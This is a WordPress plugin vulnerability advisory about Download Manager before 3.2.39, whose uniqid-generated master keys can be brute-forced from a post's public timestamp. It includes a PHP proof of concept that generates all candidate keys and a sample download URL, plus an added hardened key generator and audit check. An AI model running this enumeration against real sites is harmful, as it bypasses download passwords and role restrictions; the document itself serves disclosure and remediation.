WordPress Plugin Vulnerabilities
Download Manager < 3.2.39 - Unauthenticated brute force of files master key
Description
The plugin uses the uniqid PHP function to generate the master key for a download. Because uniqid derives its output from the current time (seconds plus microseconds), an attacker who knows the approximate creation time can brute-force the key with reasonable resources, gaining direct download access regardless of any role-based restrictions or password protection set for the download.
Proof of Concept
<?php
// The full timestamp from the post containing the download (available to an unauthenticated user.)
$wordpress_data = "2022-02-03T18:50:35+00:00";
$requestTimestamp = strtotime($wordpress_data);

// Mirror PHP's uniqid(): 8 hex digits of seconds followed by 5 hex digits of microseconds.
// Seconds and microseconds are passed as integers so every candidate is distinct
// (the original float arithmetic produced duplicates and rounding errors).
function uniqidGen($seconds, $microseconds) {
    return sprintf("%08x%05x", $seconds, $microseconds);
}

// Generate all possible master keys for the given timestamp (max 1 million keys)
for ($i = 0; $i <= 999999; $i++) {
    echo uniqidGen($requestTimestamp, $i), PHP_EOL;
}

// The download link would be something like this:
// https://example.com/download/test-download/?wpdmdl=5&_wpdmkey=6203ab5c2a704
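As an added example (not part of this advisory or the plugin's own code), the following shows the weak uniqid-based key beside a CSPRNG-based replacement, plus an audit check a site owner can run over existing keys to find ones that look like uniqid output near the download's public timestamp and rotate them. The key shape (13 bare lowercase hex digits), the one-day window and the sample key are assumptions made for the example.

```php
<?php
// Added example, not the plugin's code. Assumes keys are 13 lowercase hex
// characters as emitted by uniqid() with no prefix, and that the post timestamp
// is the publicly visible one discussed in the advisory.

// Weak form described in the advisory: uniqid() encodes the wall-clock second
// (8 hex digits) and microsecond (5 hex digits), leaving ~1e6 candidates per second.
function weak_master_key(): string {
    return uniqid();
}

// Hardened form: 128 bits from the CSPRNG, unrelated to time and not enumerable.
function strong_master_key(): string {
    return bin2hex(random_bytes(16));
}

// Audit check: does an existing key decode to a uniqid() emitted within
// $window_seconds of the download's public timestamp? (Window is a heuristic.)
function key_looks_predictable(string $key, int $post_timestamp, int $window_seconds = 86400): bool {
    if (!preg_match('/^[0-9a-f]{13}$/', $key)) {
        return false; // wrong shape for a bare uniqid() value
    }
    $seconds = hexdec(substr($key, 0, 8));
    $micros  = hexdec(substr($key, 8, 5));
    return $micros <= 999999 && abs($seconds - $post_timestamp) <= $window_seconds;
}

$post_ts = strtotime("2022-02-03T18:50:35+00:00");      // timestamp used in the advisory's PoC
$constructed_weak_key = sprintf("%08x%05x", $post_ts, 123456); // constructed sample, uniqid-shaped

foreach ([$constructed_weak_key, strong_master_key()] as $key) {
    printf("%s -> %s\n", $key, key_looks_predictable($key, $post_ts) ? "PREDICTABLE, rotate" : "ok");
}
```

The constructed uniqid-shaped key is flagged, while the random_bytes key fails the shape check and is reported as ok.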
Affects Plugins
References
CVE
Classification
Type
INSUFFICIENT CRYPTOGRAPHY
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Diogo Real
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-16 (about 2 years ago)
Added
2022-03-16 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)